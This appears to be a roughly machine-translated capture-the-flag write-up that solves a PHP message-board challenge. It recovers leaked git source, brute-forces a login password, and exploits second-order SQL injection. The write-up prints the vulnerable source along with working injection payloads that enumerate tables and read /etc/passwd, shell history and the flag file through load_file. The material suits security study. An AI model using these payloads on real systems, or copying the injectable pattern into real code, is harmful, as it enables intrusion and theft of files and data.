Offensive and defensive world comment

• Going in is a message board page. You need to log in to post. Not logged in. Go back to the login page.
• Don't do it or not, just scan it with dirsearch to see what files are there
• Wuhu! Accidentally found that git leaked! ! I still got a scan mysql.php??? The visit seems to be useless. I'll talk about it later
• GitHack downloaded it and found that it was only downloaded to write_do.php
  
• Code post

<?php
include "mysql.php";
session_start();
if($_SESSION['login'] != 'yes'){
    
    
    header("Location: ./login.php");
    die();
}
if(isset($_GET['do'])){
    
    
switch ($_GET['do'])
{
    
    
case 'write':
    break;
case 'comment':
    break;
default:
    header("Location: ./index.php");
}
}
else{
    
    
    header("Location: ./index.php");
}
?>

• So it sessionmust be equal yesto
• There is a brain hole here, we jump to login.phpa small reminder
  
• Account: zhangwei Password: zhangwei***
• Here you can try to blast to get the correct account and password! Awesome!
• Write a script to list all three-digit numbers and letter combinations

str_a='123456789abcdefghijklmnopqrstuvwxzy'
for i in str_a:
    for j in str_a:
        for k in str_a:
            print(i+j+k)

• The last password iszhangwei666
  
• After successful login, the SQL injection described in the title should be on this page. Blind guessing is a secondary injection.
• Post a post first and then read the value
• Fuck you know if it's a secondary injection or can't figure it out and watched the wp
• I found that my GitHack download was do_login.phpincomplete and attached the source code of the master

<?php
include "mysql.php";
session_start();
if($_SESSION['login'] != 'yes'){
    
    
    header("Location: ./login.php");
    die();
}
if(isset($_GET['do'])){
    
    
switch ($_GET['do'])
{
    
    
case 'write':
    $category = addslashes($_POST['category']);
    $title = addslashes($_POST['title']);
    $content = addslashes($_POST['content']);
    $sql = "insert into board
            set category = '$category',
                title = '$title',
                content = '$content'";
    $result = mysql_query($sql);
    header("Location: ./index.php");
    break;
case 'comment':
    $bo_id = addslashes($_POST['bo_id']);
    $sql = "select category from board where id='$bo_id'";
    $result = mysql_query($sql);
    $num = mysql_num_rows($result);
    if($num>0){
    
    
    $category = mysql_fetch_array($result)['category'];
    $content = addslashes($_POST['content']);
    $sql = "insert into comment
            set category = '$category',
                content = '$content',
                bo_id = '$bo_id'";
    $result = mysql_query($sql);
    }
    header("Location: ./comment.php?id=$bo_id");
    break;
default:
    header("Location: ./index.php");
}
}
else{
    
    
    header("Location: ./index.php");
}
?>
————————————————
//版权声明：本文为CSDN博主「HyyMbb」的原创文章，遵循CC 4.0 BY-SA版权协议，转载请附上原文出处链接及本声明。
//原文链接：https://blog.csdn.net/a3320315/article/details/104216070

• The key point of this topic is categorythe injection statement filled in write and the contentcontent filled in comment
• commentcategoryTake out the data directly without any filtering operation
• And we have addslashes($_POST['category'])processed it when writing , so we can spend some thought here
• And the most pitted point of this question is

$content = addslashes($_POST['content']);
    $sql = "insert into comment
            set category = '$category',
                content = '$content',
                bo_id = '$bo_id'";

• Because it is a branch insertion, it is useless to add # after the injection. /**/
• for example:

When we posted
TITLE:database
CATEGORY:123',content=database(),/*
CONTENT:123
write in the message submission place
*/#

• At this time the code becomes

$content = addslashes($_POST['content']);
    $sql = "insert into comment
            set category = '123',content=database(),/*',
                content = '*/#',
                bo_id = '$bo_id'";

insert into comment
            set category = '123',content=database(),/*',
                content = '*/#',
                bo_id = '$bo_id'";

• The page returned is
  
• Then I tried again123',content=(select group_concat(table_name) from information_schema.tables where table_schema=database()),/*
• What returned isboard,comment,user
• I checked all the tables and failed to find the flag...
• So I started to view the file again
• 123',content=(select (load_file('/etc/passwd'))),/*

insert into comment
            set category = '123',content=(select (load_file('/etc/passwd'))),/*',
                content = '*/#',
                bo_id = '$bo_id'";

• Returned value
• 123',content=(select (load_file('/home/www/.bash_history'))),/*
• 123', content=(select hex(load_file('/tmp/html/.DS_Store'))),/*
• After decodingflag_8946e1ff1ee3e40f.php
• 123',content=(select (load_file('/var/www/html/flag_8946e1ff1ee3e40f.php'))),/*
• The flag is in F12! ! ! !
  
• An afternoon of manual injection! ! !